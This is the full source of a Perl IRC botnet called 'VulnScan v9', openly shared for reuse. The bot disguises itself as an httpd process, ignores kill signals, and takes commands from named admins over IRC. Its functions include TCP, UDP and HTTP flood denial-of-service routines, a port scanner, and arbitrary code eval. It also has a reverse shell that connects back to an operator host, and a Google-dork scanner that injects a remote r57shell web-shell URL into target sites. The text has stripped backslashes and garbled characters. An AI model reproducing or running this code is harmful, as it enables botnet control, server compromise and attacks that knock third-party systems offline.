Code:
#!/usr/bin/perl
# VulnScan v9 edited by PcWoRm ( this is Morgan v8 with some changes )
#
# U can see and test it in channel: #AOD
#
# Note:
# Do what u wana,there is no copyrights =)
#
# New functions :
# New l33t colors
# Fixed Google
#
# command :
# !cmd !eval vat='google%20dork';
# !cmd @scan <time> <string> <google-dork> "mod by PescaoDeth"
# !cmd @tcp <ip> <bytes> <time>
# !cmd @udp <ip> <bytes> <time>
# !cmd @httpflood <ip> porta <bytes> <time>
# !cmd !ircomando var
# Greets to :
#
# All +ao #morgan members in irc.gigachat.net
# who cenzurat the channel =)
# otros cambios by PescaoDeth www.yashira.org nick aleatorio de un array
use HTTP::Request;
use LWP::UserAgent;
my @listanick=(
"[HackZip]"
);
################ V9 CONFIGURATION #############################################################
my $processo = '/usr/sbin/httpd'; # Fake process name for the bot #
#if (`ps uxw` =~ /HackZip/) # (CHANGE IT!!!) #
#{ # #
#exit; # #
#}
# #
###############################################################################################
my $linas_max='8'; # Avoid Flood #
###############################################################################################
my $sleep='5'; # sleep time #
##################### IRC #####################################################################
my @adms=("PescaoDeth","garcez","hackzip"); # Administrator Nickname #
###############################################################################################
my @canais=("#hackzip-coll :n43854b5"); # Channel ..if password -> ("#channel :pass") #
###############################################################################################
my $nick=$listanick[int(rand(scalar(@listanick)))]; # Nick prefix of the bot example : #
# vs[v7] = vs[v7]-718727 #
###############################################################################################
my $ircname = 'HackZip'; # Identd of the bot #
###############################################################################################
chop (my $realname = 'HackZip'); # Full Name #
###############################################################################################
$servidor='ircchat.terra.cl' unless $servidor; # Server IRC of the bot #
###############################################################################################
my $porta='7000'; # Server PORT #
################ CMD ##########################################################################
my @cmdgif='http://usuarios.lycos.es/yashirahackersteam/War/r57shell1.31.txt';#
# If you change this cmd must be same as: #
# # http://myspace.si/images/sad.gif #
###############################################################################################
my $VERSAO = 'v9';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."�"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]n";
} else {
print $IRC_cur_socket "$_[0]n";
}
}
#######################################################
# #
# Dont change nothing if u dont know what u do! #
# #
#######################################################
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /r$/) {
parse("$line");
} elsif ($line =~ /^(S+) NOTICE AUTH :***/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING :(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) PRIVMSG (.+?) :(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^�01VERSION�01$/) {
notice("$pn", "�01VERSION mIRC v6.16 Khaled Mardam-Bey�01");
}
if (grep {$_ =~ /^Q$pnE$/i } @adms) {
if ($onde eq "$meunick"){
# shell("$pn", "$args");
}
if ($args =~ /^(Q$meunickE|!cmd)s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^!nick/);
} elsif ($arg =~ /^@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
# shell("$onde", "$arg");
}
}
}
}
elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?)s+NICKs+:(S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^:(.+?)s+433/i) {
# nick("$meunick|".int rand(999999));
nick($listanick[int(rand(scalar(@listanick)))]);
} elsif ($servarg =~ m/^:(.+?)s+001s+(S+)s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal");
}
}
}
#######################################################
# #
# Dont change nothing if u dont know what u do! #
# #
#######################################################
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","59","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :�15�(�7@�2P�ortScan�15�)�� �15�(��2IP�7:�12 ".$1." �15�)� �15�(��2Status�7: �12Searching for Open Ports�15�)��");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :�15�(�7@�2P�ortScan�15�)�� �15�(��2�Concluido��15�)� �15�(��2Open Ports�7:�12 @aberta �15�)��");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :�15�(�7@�2P�ortScan�15�)�� �15�(��2�Concluido��15�)� �15�(��2No open ports found�15�)��");
}
}
if ($funcarg =~ /^tcps+(.*)s+(d+)s+(d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :�15�(�7@��2TCP Flood�15�)� �15�(��2�Started��15�) (��2IP�7:�12 ".$1." �2Porta�7:�12 ".$2." �2Tempo�7:�12 ".$3." �2segundos�15�)��");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :�15�(�7@��2TCP Flood�15�)� �15�(��2�Finished��15�) (��2IP�7:�12 ".$1." �2Porta�7:�12 ".$2." �15�)��");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :�15�(�7@��2Versao�15�)� �12Vulnscan �2v8�7 ");
}
if ($funcarg =~ /^backs+(.*)s+(d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :�15�(�7@��2ConnectBack�15�)� �15�(��2�Connecting��15�)� �(��2IP�7�/��2Port�7:�12 $host:$porta �15�)�");
}
}
#SCANNER
if ($funcarg =~ /^scans+(d+)s+(.*)s+(.*)/) {
@gstring = $3;
$boturl=$2;
foreach my $googledork (@gstring){
sendraw($IRC_cur_socket, "PRIVMSG $printl :�15�(�7@��2Dork �7:�12 '".$googledork."' �15�)��");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :��15(�7@��2Scan�15�)� �(���2Started��15�)� �(��2Searching for�7:�12 ".$boturl." �2Time�7:�12 ".$1." �2seconds�15�)�");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
#sendraw($IRC_cur_socket, "PRIVMSG #debug :��15(�7@��2Scan�15�)� �15�(��2Exploiting�7:�12 ".$url2." �15�)��");
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmdgif?";
print "n".$url2."nn";
#######################################################
# #
# Dont change nothing if u dont know what u do! #
# #
#######################################################
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /r57shell.php/ && $response->content =~ /r57shell/ ){
sendraw($IRC_cur_socket, "PRIVMSG $printl :�15�(�7@��2Vulnerable�15�)�� �15�(��2Vuln�7:�12 ".$url2." �15�)��");
}
}
else {
}
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :��15(�7@��2Scan�15�)� �15�(��2�Finished��15�) (��2Scan Finished�7:�12 ".$1." �2seconds�15�)");
}
if ($funcarg =~ /^https+(.*)s+(d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :�15�(�7@��2HTTP Flood�15�)� �(��2�Started��15�)� �(��2Victim�7:�12 ".$1."�7:�1280 �2Time�7:�12 ".$2." �2seconds�15�)��");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1rnAccept: */*rnHost: ".$1."rnConnection: Keep-Alivernrn";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :��15(�7@��2HTTP Flood�15�)� �(��2�Finished��15�)� ��15(��2Victim�7:�12 ".$1."�15�)��");
}
if ($funcarg =~ /^udps+(.*)s+(d+)s+(d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :��15(�7@��2UDP Flood�15�)� ��15(��2�Started��15�)� �(��2Victim�7:�12 ".$1." �2Size�7:�12 ".$2." �7KB �2Time�7:�12 ".$3." �2seconds�15�)�");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :��15(�7@��2UDP Flood�15�)� ��15(��2�Finished��15�)� �15�(��2Sent�7:�12 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." �7KB �2in�12 ".$dtime." �2seconds�15�) (��2Victim�7:�12 ".$1."�15�)�");
}
exit;
}
}
}
#######################################################
# #
# Dont change nothing if u dont know what u do! #
# #
#######################################################
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoins+(.*)/) {
my $chan = $1;
if ($chan =~ /^(d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(S+)s+(S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(S+)s+(S+)/);
}
if ($case =~ /^msgs+(S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^floods+(d+)s+(S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcps+(S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpfloods+(d+)s+(S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connects+(S+)s+(S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
#######################################################
# #
# Dont change nothing if u dont know what u do! #
# #
##################################################################
# This is part for shell if u wana to be active just remove "#" #
##################################################################
#sub shell {
# my $printl=$_[0];
#my $comando=$_[1];
# if ($comando =~ /cd (.*)/) {
# chdir("$1") || msg("$printl", "�15�(�7@��2INFO�15�)� �(��2No souch file/directory�15�)�");
# return;
# }
# elsif ($pid = fork) {
# waitpid($pid, 0);
# } else {
# if (fork) {
# exit;
# } else {
# my @resp=`$comando 2>&1 3>&1`;
# my $c=0;
# foreach my $linha (@resp) {
# $c++;
# chop $linha;
# sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
# if ($c == "$linas_max") {
# $c=0;
# sleep $sleep;
# }
# }
# exit;
# }
# }
#}
#######################################################
# #
# Dont change nothing if u dont know what u do! #
# #
#######################################################
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
#######################################################
# #
# Dont change nothing if u dont know what u do! #
# #
#######################################################
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :�01$_[1]�01");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
#######################################################
# #
# Dont change nothing if u dont know what u do! #
# #
#######################################################
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
{
my @dominios = ("removed-them-all");
my @str;
foreach $dom (@dominios)
{
push (@str,"@gstring");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
#sendraw("privmsg #channel :DEBUG only test googling: ".$query."");
my $page = http_query($query);
while ($page =~ m/<a class=l href="?http://([^>"]+)"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href="?http:////;
$host =~ s/([-a-zA-Z0-9.]+)/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0rnHost: $hostrnAccept: */*rnUser-Agent: Mozilla/5.0rnrn";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}
# NOTE:REMOVE COPYRIGHTS AND WHAT U WANA =) THERE IS NO RULES! ENJOY =) |
(dar sunt slab recunosc)
